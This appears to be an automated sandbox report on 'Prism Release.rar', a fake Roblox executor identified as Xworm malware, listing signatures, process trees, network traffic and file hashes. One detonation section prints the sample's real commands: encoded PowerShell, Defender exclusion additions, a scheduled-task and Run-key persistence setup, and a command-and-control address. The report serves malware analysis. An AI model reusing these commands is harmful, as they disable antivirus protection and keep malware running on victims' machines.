Analysis Overview
SHA256
1f4fbb86e1e513b8bed2fa7a011d094e9f4dbb213e7ae8c34693c6f5343442c3
Threat Level: Known bad
The file Prism Release.rar was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies registry class
Kills process with taskkill
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 04:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240508-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\ByfronHook.dll",#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240611-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\assets.dll",#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\bin\autoattach.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240611-en
Max time kernel
92s
Max time network
150s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\workspace\Saved Scripts.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240508-en
Max time kernel
148s
Max time network
146s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Prism Executor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2756_133628985055620000\nexusloader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\Prism Executor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2756_133628985055620000\nexusloader.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
C:\Users\Admin\Prism Executor.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2756_133628985055620000\nexusloader.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {E5851CB1-D6CC-4A59-A476-D9EBC716D841} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp |
Files
\Users\Admin\dllhost.exe
| MD5 | 4a7f75343aaa5a4d8d18add50ccf3139 |
| SHA1 | 110c62eee6d7deb4aa9d601c942eae43482d2125 |
| SHA256 | 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e |
| SHA512 | 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79 |
\Users\Admin\Prism Executor.exe
| MD5 | fa819e23d8fee4ea89aaaea55e0b28f5 |
| SHA1 | 18335d4e0d140dcab66c7197c57f669251898ce5 |
| SHA256 | bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c |
| SHA512 | e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cf1631bddcf9f89e6ef380fac12fddd1 |
| SHA1 | bc68eae50eb8c31d75b046206c452ed8300e5c15 |
| SHA256 | e17ab7c4749955eae9f9492e1d5e0655ba3af04d64f00778623b9b1eae05958f |
| SHA512 | 7b0ed42de7692662a69f0ad69bc9cb8c663c24ebd7992566ae47b056424ddcd4dec1449d8f85ee051fc956bb33550ffac5f248d8d7284ce6d64ee41be556bae8 |
memory/1972-18-0x00000000003D0000-0x00000000003EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_2756_133628985055620000\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\onefile_2756_133628985055620000\nexusloader.exe
| MD5 | 58545dc488990ac11872079d119f8284 |
| SHA1 | dade5c16834d582a5187041697cc5a7c2eae2f88 |
| SHA256 | 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc |
| SHA512 | 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1788-1880-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/1788-1881-0x00000000027E0000-0x00000000027E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 897c71ae569877204786117dc97f6db2 |
| SHA1 | 2cf4bd7ca727bb98d4ae808b99134493cd50464f |
| SHA256 | 1f18bd2c36f44af596bc6b79e00529f91f14f6259d2961a8ebc914209a7fe8b0 |
| SHA512 | e816a3038d9d535de3c124b8be571705422a0bb6df93daa30cf9780435c7875d29b822635f5b68d38106232f96b588e96b2081231bd19500f8c7d854e4b6c795 |
memory/2004-1887-0x000000001B650000-0x000000001B932000-memory.dmp
memory/2004-1888-0x0000000002280000-0x0000000002288000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240220-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\instructions.txt"
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\license.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20231129-en
Max time kernel
71s
Max time network
147s
Command Line
Signatures
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Prism Release.rar"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Prism Release.rar
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\Prism Release.rar"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e39758,0x7fef6e39768,0x7fef6e39778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1188 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1420 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2252 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2260 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1916 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3244 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3208 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3696 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3648 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1136 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3432 --field-trial-handle=1376,i,9108472552861906383,1155630171081689727,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.187.206:443 | encrypted-tbn2.gstatic.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| DE | 128.116.44.4:443 | www.roblox.com | tcp |
| DE | 128.116.44.4:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| DE | 128.116.44.4:443 | www.roblox.com | udp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
| US | 205.234.175.102:443 | js.rbxcdn.com | tcp |
